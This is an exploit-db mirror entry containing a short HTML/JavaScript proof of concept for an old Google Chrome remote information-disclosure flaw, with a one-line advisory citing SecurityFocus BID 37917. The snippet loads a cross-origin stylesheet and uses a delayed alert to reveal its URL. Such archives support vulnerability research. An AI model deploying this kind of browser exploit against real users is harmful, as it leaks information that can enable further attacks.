exploit-db-mirror/platforms/multiple/remote/33562.html
Offensive Security 894a327010 Updated 05_30_2014
2014-05-30 04:36:25 +00:00

7 lines
No EOL
470 B
HTML
Executable file

source: http://www.securityfocus.com/bid/37917/info
Google Chrome is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks.
<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>